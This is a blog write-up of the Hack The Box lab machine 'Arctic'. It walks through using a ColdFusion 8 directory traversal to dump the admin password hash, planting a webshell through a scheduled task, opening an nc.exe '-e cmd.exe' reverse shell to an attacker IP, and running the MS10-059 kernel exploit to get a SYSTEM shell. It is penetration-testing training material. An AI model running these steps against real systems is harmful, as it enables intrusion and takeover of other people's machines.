<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.2"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Hack The Box - Arctic (Without Metasploit)" /><meta name="author" content="rizemon" /><meta property="og:locale" content="en_US" /><meta name="description" content="Just bloggin cyber security related content." /><meta property="og:description" content="Just bloggin cyber security related content." /><link rel="canonical" href="https://rizemon.github.io/posts/arctic-htb/" /><meta property="og:url" content="https://rizemon.github.io/posts/arctic-htb/" /><meta property="og:site_name" content="rizemon’s blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-16T18:46:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack The Box - Arctic (Without Metasploit)" /><meta name="twitter:site" content="@rizemon" /><meta name="twitter:creator" content="@rizemon" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"rizemon"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://rizemon.github.io/posts/arctic-htb/"},"description":"Just bloggin cyber security related content.","url":"https://rizemon.github.io/posts/arctic-htb/","@type":"BlogPosting","headline":"Hack The Box - Arctic (Without Metasploit)","dateModified":"2021-01-16T18:46:00+08:00","datePublished":"2021-01-16T18:46:00+08:00","@context":"https://schema.org"}</script><title>Hack The Box - Arctic (Without Metasploit) | rizemon's blog</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/portfolio.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">rizemon's blog</a></div><div class="site-subtitle font-italic">Cyber Security Enthusiast.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT ME</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/rizemon" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/rizemon" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack The Box - Arctic (Without Metasploit)</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack The Box - Arctic (Without Metasploit)</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sat, Jan 16, 2021, 6:46 PM +0800" > Jan 16, 2021 <i class="unloaded">2021-01-16T18:46:00+08:00</i> </span> by <span class="author"> rizemon </span></div><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1433 words">7 min</span></div></div><div class="post-content"><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic.png" alt="" height="414px" width="615px" /></p><h1 id="configuration">Configuration</h1><p>The operating system that I will be using to tackle this machine is a Kali Linux VM.</p><p>What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to <code class="language-plaintext highlighter-rouge">/etc/hosts</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"10.10.10.11 arctic.htb"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /etc/hosts
</pre></table></code></div></div><h1 id="reconnaissance">Reconnaissance</h1><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
</pre><td class="rouge-code"><pre><span class="nv">$ </span>rustscan <span class="nt">--accessible</span> <span class="nt">-a</span> arctic.htb <span class="nt">-r</span> 1-65535 <span class="nt">--</span> <span class="nt">-sT</span> <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-Pn</span>
File limit higher than batch size. Can increase speed by increasing batch size <span class="s1">'-b 1048476'</span><span class="nb">.</span>
Open 10.10.10.11:135
Open 10.10.10.11:8500
Open 10.10.10.11:49154
Starting Script<span class="o">(</span>s<span class="o">)</span>
Script to be run Some<span class="o">(</span><span class="s2">"nmap -vvv -p  "</span><span class="o">)</span>

Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-01-16 06:21 UTC
NSE: Loaded 151 scripts <span class="k">for </span>scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
NSE: Starting runlevel 2 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
NSE: Starting runlevel 3 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
Initiating Connect Scan at 06:21
Scanning arctic.htb <span class="o">(</span>10.10.10.11<span class="o">)</span> <span class="o">[</span>3 ports]
Discovered open port 135/tcp on 10.10.10.11
Discovered open port 49154/tcp on 10.10.10.11
Discovered open port 8500/tcp on 10.10.10.11
Completed Connect Scan at 06:21, 0.01s elapsed <span class="o">(</span>3 total ports<span class="o">)</span>
Initiating Service scan at 06:21
Scanning 3 services on arctic.htb <span class="o">(</span>10.10.10.11<span class="o">)</span>
Completed Service scan at 06:23, 143.58s elapsed <span class="o">(</span>3 services on 1 host<span class="o">)</span>
NSE: Script scanning 10.10.10.11.
NSE: Starting runlevel 1 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 14.03s elapsed
NSE: Starting runlevel 2 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 1.02s elapsed
NSE: Starting runlevel 3 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
Nmap scan report <span class="k">for </span>arctic.htb <span class="o">(</span>10.10.10.11<span class="o">)</span>
Host is up, received user-set <span class="o">(</span>0.0053s latency<span class="o">)</span><span class="nb">.</span>
Scanned at 2021-01-16 06:21:21 UTC <span class="k">for </span>158s

PORT      STATE SERVICE REASON  VERSION
135/tcp   open  msrpc   syn-ack Microsoft Windows RPC
8500/tcp  open  fmtp?   syn-ack
49154/tcp open  msrpc   syn-ack Microsoft Windows RPC
Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
NSE: Starting runlevel 2 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
NSE: Starting runlevel 3 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>160.05 seconds
</pre></table></code></div></div><h1 id="enumeration-1">Enumeration (1)</h1><h2 id="port-8500-coldfusion">Port 8500 <code class="language-plaintext highlighter-rouge">ColdFusion</code></h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic1.png" alt="" /></p><p>We are presented with a directory listing with 2 entries. We then come across with a <code class="language-plaintext highlighter-rouge">Adobe ColdFusion 8</code> login page on <code class="language-plaintext highlighter-rouge">http://arctic.htb:8500/CFIDE/administrator/</code></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic2.png" alt="" /></p><p>Using <code class="language-plaintext highlighter-rouge">searchsploit</code>, we see that <code class="language-plaintext highlighter-rouge">Adobe ColdFusion</code> has a directory traversal vulnerability.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="nv">$ </span>searchsploit Adobe ColdFusion 
<span class="nt">---------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title                                                             |  Path
<span class="nt">---------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
Adobe ColdFusion - <span class="s1">'probe.cfm'</span> Cross-Site Scripting                        | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                     | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal <span class="o">(</span>Metasploit<span class="o">)</span>                        | multiple/remote/16985.rb
...
</pre></table></code></div></div><h1 id="exploitation-1">Exploitation (1)</h1><p>After copying the script, we are able to dump out the password hash of admin’s password.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="nv">$ </span>python 14641.py arctic.htb 8500 <span class="s2">"../../../../../../../../ColdFusion8/lib/password.properties"</span>  
<span class="nt">------------------------------</span>
trying /CFIDE/wizards/common/_logintowizard.cfm
title from server <span class="k">in</span> /CFIDE/wizards/common/_logintowizard.cfm:
<span class="nt">------------------------------</span>
<span class="c">#Wed Mar 22 20:53:51 EET 2017</span>
<span class="nv">rdspassword</span><span class="o">=</span>0IA/F[[E&gt;[<span class="nv">$_6</span>&amp; <span class="se">\\</span>Q&gt;[K<span class="se">\=</span>XP  <span class="se">\n</span>
<span class="nv">password</span><span class="o">=</span>2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
<span class="nv">encrypted</span><span class="o">=</span><span class="nb">true</span>
<span class="nt">------------------------------</span>
<span class="nt">------------------------------</span>
...
</pre></table></code></div></div><p>Using <code class="language-plaintext highlighter-rouge">crackstation</code>, we are able to crack the <code class="language-plaintext highlighter-rouge">SHA1</code> hash.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic3.png" alt="" /></p><p>With the password, we can login.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic4.png" alt="" /></p><p>To obtain a foothold, we need to see what directory this web application is running from. We can do this by going to <code class="language-plaintext highlighter-rouge">Server Settings</code> &gt; <code class="language-plaintext highlighter-rouge">Mappings</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic5.png" alt="" /></p><p>Here, we take note that the directory path is <code class="language-plaintext highlighter-rouge">C:\ColdFusion8\wwwroot\CFIDE</code>.</p><p>Then, we go to <code class="language-plaintext highlighter-rouge">Debugging &amp; Logging</code> &gt; <code class="language-plaintext highlighter-rouge">Scheduled Tasks</code> and click on <code class="language-plaintext highlighter-rouge">Schedule New Task</code>. We then configure it with the following details. Note that for the time, we will need to follow <code class="language-plaintext highlighter-rouge">UTC</code> time. Make sure to include some leeway for setting up the web server and letting the scheduled task run.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic6.png" alt="" /></p><p>After that is done, immediately start a web server with <code class="language-plaintext highlighter-rouge">http.server</code> or <code class="language-plaintext highlighter-rouge">updog</code> on port <code class="language-plaintext highlighter-rouge">80</code> and make sure that the <a href="https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm">cfexec.cfm</a> is being hosted.</p><p>Subsequently, the <code class="language-plaintext highlighter-rouge">cfexec.cfm</code> will be downloaded and saved at <code class="language-plaintext highlighter-rouge">/CFIDE/cfexec.cfm</code>. We can then access it and we will see a webshell.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/arctic7.png" alt="" /></p><p>Now, lets upgrade to a reverse shell.</p><p>We first setup a <code class="language-plaintext highlighter-rouge">SMB</code> server with <code class="language-plaintext highlighter-rouge">smbserver.py</code> and make sure that <code class="language-plaintext highlighter-rouge">nc.exe</code> is being shared.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">mkdir </span>share
<span class="nv">$ </span><span class="nb">cd </span>share
<span class="nv">$ </span><span class="nb">cp</span> /usr/share/windows-resources/binaries/nc.exe <span class="nb">.</span>
<span class="nv">$ </span><span class="nb">sudo </span>python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali <span class="nb">.</span>                       
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Callback added <span class="k">for </span>UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Callback added <span class="k">for </span>UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
</pre></table></code></div></div><p>We then setup our <code class="language-plaintext highlighter-rouge">nc</code> listener</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lvnp</span> 1337
listening on <span class="o">[</span>any] 1337 ...
</pre></table></code></div></div><p>And then enter the following parameters into the webshell and hit <code class="language-plaintext highlighter-rouge">Exec</code>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>Command: \\10.10.XX.XX\kali\nc.exe
Options: -e cmd.exe 10.10.XX.XX 1337
</pre></table></code></div></div><p>After a while, we will receive a shell as <code class="language-plaintext highlighter-rouge">tolis</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lvnp</span> 1337
listening on <span class="o">[</span>any] 1337 ...
connect to <span class="o">[</span>10.10.XX.XX] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11] 49354
Microsoft Windows <span class="o">[</span>Version 6.1.7600]
Copyright <span class="o">(</span>c<span class="o">)</span> 2009 Microsoft Corporation.  All rights reserved.

C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span><span class="k">in</span><span class="o">&gt;</span><span class="nb">whoami
whoami
</span>arctic<span class="se">\t</span>olis
</pre></table></code></div></div><h1 id="usertxt">user.txt</h1><p>The user flag is in <code class="language-plaintext highlighter-rouge">tolis</code>’s Desktop.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>C:\ColdFusion8\runtime\bin&gt; type C:\Users\tolis\Desktop\user.txt
0265XXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h1 id="enumeration-2">Enumeration (2)</h1><p>Lets use <a href="https://github.com/AonCyberLabs/Windows-Exploit-Suggester"><code class="language-plaintext highlighter-rouge">Windows-Exploit-Suggester</code></a> and see what exploits are available.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre><span class="nv">$ </span>python windows-exploit-suggester.py <span class="nt">--database</span> 2021-01-16-mssb.xls <span class="nt">--systeminfo</span> ~/Desktop/htb/arctic/systeminfo
<span class="o">[</span><span class="k">*</span><span class="o">]</span> initiating winsploit version 3.3...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> database file detected as xls or xlsx based on extension
<span class="o">[</span><span class="k">*</span><span class="o">]</span> attempting to <span class="nb">read </span>from the systeminfo input file
<span class="o">[</span>+] systeminfo input file <span class="nb">read </span>successfully <span class="o">(</span>utf-8<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> querying database file <span class="k">for </span>potential vulnerabilities
<span class="o">[</span><span class="k">*</span><span class="o">]</span> comparing the 0 hotfix<span class="o">(</span>es<span class="o">)</span> against the 197 potential bulletins<span class="o">(</span>s<span class="o">)</span> with a database of 137 known exploits
<span class="o">[</span><span class="k">*</span><span class="o">]</span> there are now 197 remaining vulns
<span class="o">[</span>+] <span class="o">[</span>E] exploitdb PoC, <span class="o">[</span>M] Metasploit module, <span class="o">[</span><span class="k">*</span><span class="o">]</span> missing bulletin
<span class="o">[</span>+] windows version identified as <span class="s1">'Windows 2008 R2 64-bit'</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 
<span class="o">[</span>M] MS13-009: Cumulative Security Update <span class="k">for </span>Internet Explorer <span class="o">(</span>2792100<span class="o">)</span> - Critical
<span class="o">[</span>M] MS13-005: Vulnerability <span class="k">in </span>Windows Kernel-Mode Driver Could Allow Elevation of Privilege <span class="o">(</span>2778930<span class="o">)</span> - Important
<span class="o">[</span>E] MS12-037: Cumulative Security Update <span class="k">for </span>Internet Explorer <span class="o">(</span>2699988<span class="o">)</span> - Critical
<span class="o">[</span><span class="k">*</span><span class="o">]</span>   http://www.exploit-db.com/exploits/35273/ <span class="nt">--</span> Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5., PoC
<span class="o">[</span><span class="k">*</span><span class="o">]</span>   http://www.exploit-db.com/exploits/34815/ <span class="nt">--</span> Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5.0 Bypass <span class="o">(</span>MS12-037<span class="o">)</span>, PoC
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 
<span class="o">[</span>E] MS11-011: Vulnerabilities <span class="k">in </span>Windows Kernel Could Allow Elevation of Privilege <span class="o">(</span>2393802<span class="o">)</span> - Important
<span class="o">[</span>M] MS10-073: Vulnerabilities <span class="k">in </span>Windows Kernel-Mode Drivers Could Allow Elevation of Privilege <span class="o">(</span>981957<span class="o">)</span> - Important
<span class="o">[</span>M] MS10-061: Vulnerability <span class="k">in </span>Print Spooler Service Could Allow Remote Code Execution <span class="o">(</span>2347290<span class="o">)</span> - Critical
<span class="o">[</span>E] MS10-059: Vulnerabilities <span class="k">in </span>the Tracing Feature <span class="k">for </span>Services Could Allow Elevation of Privilege <span class="o">(</span>982799<span class="o">)</span> - Important
<span class="o">[</span>E] MS10-047: Vulnerabilities <span class="k">in </span>Windows Kernel Could Allow Elevation of Privilege <span class="o">(</span>981852<span class="o">)</span> - Important
<span class="o">[</span>M] MS10-002: Cumulative Security Update <span class="k">for </span>Internet Explorer <span class="o">(</span>978207<span class="o">)</span> - Critical
<span class="o">[</span>M] MS09-072: Cumulative Security Update <span class="k">for </span>Internet Explorer <span class="o">(</span>976325<span class="o">)</span> - Critical
<span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="k">done</span>
</pre></table></code></div></div><p>I will be using <code class="language-plaintext highlighter-rouge">MS10-059</code> and there’s even a <a href="https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe">compiled executable</a> for it, ready to use.</p><h1 id="exploitation-2">Exploitation (2)</h1><p>After transferring over <code class="language-plaintext highlighter-rouge">MS10-059.exe</code>, we will need to setup another <code class="language-plaintext highlighter-rouge">nc</code> listener.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lvnp</span> 1337
listening on <span class="o">[</span>any] 1337 ...
</pre></table></code></div></div><p>And then we can execute the kernel exploit to get a shell as <code class="language-plaintext highlighter-rouge">SYSTEM</code>!</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>C:\tmp&gt; MS10-059.exe 10.10.XX.XX 1337
/Chimichurri/--&gt;This exploit gives you a Local System shell &lt;BR&gt;/Chimichurri/--&gt;Changing registry values...&lt;BR&gt;/Chimichurri/--&gt;Got SYSTEM token...&lt;BR&gt;/Chimichurri/--&gt;Running reverse shell...&lt;BR&gt;/Chimichurri/--&gt;Restoring default registry values...&lt;BR&gt;
